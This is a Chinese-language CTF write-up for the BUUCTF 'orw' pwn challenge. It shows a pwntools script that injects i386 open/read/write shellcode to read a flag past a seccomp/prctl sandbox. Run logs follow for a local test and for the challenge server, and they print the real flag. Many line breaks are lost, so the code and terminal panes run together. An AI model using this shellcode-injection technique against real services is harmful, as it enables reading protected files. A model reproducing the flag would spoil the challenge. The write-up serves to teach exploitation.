从零开始做题：逆向 ret2shellcode orw

1.题目信息

BUUCTF在线评测

下载orw时防病毒要关闭

 

2.题目分析 

orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护，并不能getshell。只能通过orw的方式拿到flag。

fd=open（‘./flag’); # 打开flag文件，得到fd

read（fd，buf，0x30); #通过fd将flag的内容读到内存中

write（1，buf，0x30); #将内存中的flag内容输出到屏幕

在相关目录里面写入以下内容

holyeyes@ubuntu:~/Re/6$ echo "flag{testtest}" >./flag
holyeyes@ubuntu:~/Re/6$ 
 

3.解题脚本

root@pwn_test1604:/ctf/work/6# ls
orw  orw.i64  orw.py
root@pwn_test1604:/ctf/work/6# python
Python 2.7.12 (default, Nov 12 2018, 14:36:49) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "./flag".encode('hex')
'2e2f666c6167'
>>> "./flag\x00\x00".encode('hex')
'2e2f666c61670000'
>>> 

3.1只用修改的内容 

context.arch='i386'DEBUG = 1LOCAL = True
BIN   ='./orw'
HOST  ='node5.buuoj.cn'
PORT  =25178def exploit(p):p.recv()pl = """xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5    #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3     #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4     #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80"""p.sendline(asm(pl))p.interactive()return

3.2全部脚本 

#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'
context.arch='i386'DEBUG = 1LOCAL = True
BIN   ='./orw'
HOST  ='node5.buuoj.cn'
PORT  =25178def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):p.recv()pl = """xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5    #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3     #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4     #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80"""p.sendline(asm(pl))p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)

 3.3 运行本地

root@pwn_test1604:/ctf/work/6# tmux

root@pwn_test1604:/ctf/work/6# python orw.py 

root@pwn_test1604:/ctf/work/6# python orw.py                                        [25/25]│   f 1 f765ab23 __read_nocancel+25                                                  [0/48]
[DEBUG] PLT 0x8048370 read                                                                 │   f 2  8048582 main+58
[DEBUG] PLT 0x8048370 read                                                                 │   f 3 f759d637 __libc_start_main+247
[DEBUG] PLT 0x8048380 printf                                                               │pwndbg> c
[DEBUG] PLT 0x8048390 __stack_chk_fail                                                     │Continuing.
[DEBUG] PLT 0x80483a0 __libc_start_main                                                    │
[DEBUG] PLT 0x80483b0 prctl                                                                │Program received signal SIGSEGV, Segmentation fault.
[DEBUG] PLT 0x80483c0 __gmon_start__                                                       │0x0804a0a8 in shellcode ()
[*] '/ctf/work/6/orw'                                                                      │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch:     i386-32-little                                                               │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO:    Partial RELRO                                                                │ EAX  0x30Stack:    Canary found                                                                 │ EBX  0x1NX:       NX disabled                                                                  │ ECX  0xffbd74b4 ◂— 0x67616c66 ('flag')PIE:      No PIE (0x8048000)                                                           │ EDX  0x30RWX:      Has RWX segments                                                             │ EDI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
[+] Starting local process './orw': pid 179                                                │ ESI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
[*] PID: 179                                                                               │ EBP  0xffbd74c8 ◂— 0x0
[DEBUG] Wrote gdb script to '/tmp/pwn1jT2Ys.gdb'                                           │ ESP  0xffbd74b4 ◂— 0x67616c66 ('flag')file ./orw                                                                             │ EIP  0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */handle SIGALRM ignore                                                                  │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base = 0x8048000                                                                 │ ► 0x804a0a8 <shellcode+72>    or     al, byte ptr [eax]
[*] running in new terminal: /usr/bin/gdb -q  "./orw" 179 -x "/tmp/pwn1jT2Ys.gdb"          │   0x804a0aa <shellcode+74>    add    byte ptr [eax], al
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q  "./orw" 1│   0x804a0ac <shellcode+76>    add    byte ptr [eax], al
79 -x "/tmp/pwn1jT2Ys.gdb"']                                                               │   0x804a0ae <shellcode+78>    add    byte ptr [eax], al
[+] Waiting for debugger: Done 
[DEBUG] Received 0x17 bytes:                                                         [0/25]│   f 1 f765ab23 __read_nocancel+25                                                  [0/48]'Give my your shellcode:'                                                              │   f 2  8048582 main+58
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│   f 3 f759d637 __libc_start_main+247
ludes /dev/stdin                                                                           │pwndbg> c
[DEBUG] Assembling                                                                         │Continuing..section .shellcode,"awx"                                                              │.global _start                                                                         │Program received signal SIGSEGV, Segmentation fault..global __start                                                                        │0x0804a0a8 in shellcode ()_start:                                                                                │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA__start:                                                                               │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix                                                                 │ EAX  0x30xor eax, eax                                                                       │ EBX  0x1xor ebx, ebx                                                                       │ ECX  0xffbd74b4 ◂— 0x67616c66 ('flag')xor ecx, ecx                                                                       │ EDX  0x30xor edx, edx                                                                       │ EDI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */push 0x00006761                                                                    │ ESI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */push 0x6c662f2e                                                                    │ EBP  0xffbd74c8 ◂— 0x0mov eax, 5 #open('./flag')                                                         │ ESP  0xffbd74b4 ◂— 0x67616c66 ('flag')mov ebx, esp                                                                       │ EIP  0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */mov ecx, 0                                                                         │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0                                                                         │ ► 0x804a0a8 <shellcode+72>    or     al, byte ptr [eax]int 0x80                                                                           │   0x804a0aa <shellcode+74>    add    byte ptr [eax], almov ebx, eax                                                                       │   0x804a0ac <shellcode+76>    add    byte ptr [eax], almov eax, 3 #read(fd,esp,0x30)                                                      │   0x804a0ae <shellcode+78>    add    byte ptr [eax], almov ecx, esp                                                                       │   0x804a0b0 <shellcode+80>    add    byte ptr [eax], almov edx, 0x30                                                                      │   0x804a0b2 <shellcode+82>    add    byte ptr [eax], alint 0x80                                                                           │   0x804a0b4 <shellcode+84>    add    byte ptr [eax], almov eax, 4 #write(1,esp,0x30)                                                      │   0x804a0b6 <shellcode+86>    add    byte ptr [eax], almov ebx, 1                                                                         │   0x804a0b8 <shellcode+88>    add    byte ptr [eax], almov ecx, esp                                                                       │   0x804a0ba <shellcode+90>    add    byte ptr [eax], almov edx, 0x30                                                                      │   0x804a0bc <shellcode+92>    add    byte ptr [eax], alint 0x80                                                                           │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp  0xffbd74b4 ◂— 0x67616c66 ('flag')
tep1                                                                                       │01:0004│          0xffbd74b8 ◂— 0x7365747b ('{tes')
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│          0xffbd74bc ◂— 0x73657474 ('ttes')
/tmp/pwn-asm-bw_t9d/step4                                                                  │03:000c│          0xffbd74c0 ◂— 0xf70a7d74
[DEBUG] Sent 0x49 bytes:                                                                   │04:0010│          0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000  31 c0 31 db  31 c9 31 d2  68 61 67 00  00 68 2e 2f  │1·1·│1·1·│hag·│·h./│    │05:0014│ ebp      0xffbd74c8 ◂— 0x000000010  66 6c b8 05  00 00 00 89  e3 b9 00 00  00 00 ba 00  │fl··│····│····│····│    │06:0018│          0xffbd74cc —▸ 0xf759d637 (__libc_start_main+247) ◂— add    esp, 0x1000000020  00 00 00 cd  80 89 c3 b8  03 00 00 00  89 e1 ba 30  │····│····│····│···0│    │07:001c│          0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 000000030  00 00 00 cd  80 b8 04 00  00 00 bb 01  00 00 00 89  │····│····│····│····│    │x1b1db0 */00000040  e1 ba 30 00  00 00 cd 80  0a                        │··0·│····│·│            │──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────    00000049                                                                               │ ► f 0  804a0a8 shellcode+72
[*] Switching to interactive mode                                                          │   f 1 67616c66
[DEBUG] Received 0x30 bytes:                                                               │   f 2 7365747b00000000  66 6c 61 67  7b 74 65 73  74 74 65 73  74 7d 0a f7  │flag│{tes│ttes│t}··│    │   f 3 7365747400000010  e0 74 bd ff  00 00 00 00  37 d6 59 f7  00 70 73 f7  │·t··│····│7·Y·│·ps·│    │   f 4 f70a7d7400000020  00 70 73 f7  00 00 00 00  37 d6 59 f7  01 00 00 00  │·ps·│····│7·Y·│····│    │   f 5 ffbd74e000000030                                                                               │   f 6 f759d637 __libc_start_main+247
flag{testtest}                                                                             │Program received signal SIGSEGV (fault address 0x30)
��\xff\x00\x00\x00\x007�ps�ps�\x007�\x00$  

3.4 运行远程

root@pwn_test1604:/ctf/work/6# python orw.py 1

root@pwn_test1604:/ctf/work/6# tmux
[exited]
root@pwn_test1604:/ctf/work/6# python orw.py 1
[DEBUG] PLT 0x8048370 read
[DEBUG] PLT 0x8048380 printf
[DEBUG] PLT 0x8048390 __stack_chk_fail
[DEBUG] PLT 0x80483a0 __libc_start_main
[DEBUG] PLT 0x80483b0 prctl
[DEBUG] PLT 0x80483c0 __gmon_start__
[*] '/ctf/work/6/orw'Arch:     i386-32-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX disabledPIE:      No PIE (0x8048000)RWX:      Has RWX segments
[+] Opening connection to node5.buuoj.cn on port 25178: Done
[DEBUG] Received 0x17 bytes:'Give my your shellcode:'
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,"awx".global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open('./flag')mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4
[DEBUG] Sent 0x49 bytes:00000000  31 c0 31 db  31 c9 31 d2  68 61 67 00  00 68 2e 2f  │1·1·│1·1·│hag·│·h./│00000010  66 6c b8 05  00 00 00 89  e3 b9 00 00  00 00 ba 00  │fl··│····│····│····│00000020  00 00 00 cd  80 89 c3 b8  03 00 00 00  89 e1 ba 30  │····│····│····│···0│00000030  00 00 00 cd  80 b8 04 00  00 00 bb 01  00 00 00 89  │····│····│····│····│00000040  e1 ba 30 00  00 00 cd 80  0a                        │··0·│····│·│00000049
[*] Switching to interactive mode
[DEBUG] Received 0x30 bytes:00000000  66 6c 61 67  7b 31 30 33  37 66 34 39  62 2d 33 30  │flag│{103│7f49│b-30│00000010  36 63 2d 34  30 34 32 2d  38 34 31 31  2d 34 38 34  │6c-4│042-│8411│-484│00000020  39 32 64 61  35 37 30 36  62 7d 0a f7  01 00 00 00  │92da│5706│b}··│····│00000030
flag{1037f49b-306c-4042-8411-48492da5706b}
�\x0[DEBUG] Received 0x2b bytes:'timeout: the monitored command dumped core\n'
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$  

3.5 避坑提醒

用kali2023的虚机环境不行，要用ubuntu16.04的虚机环境就可以。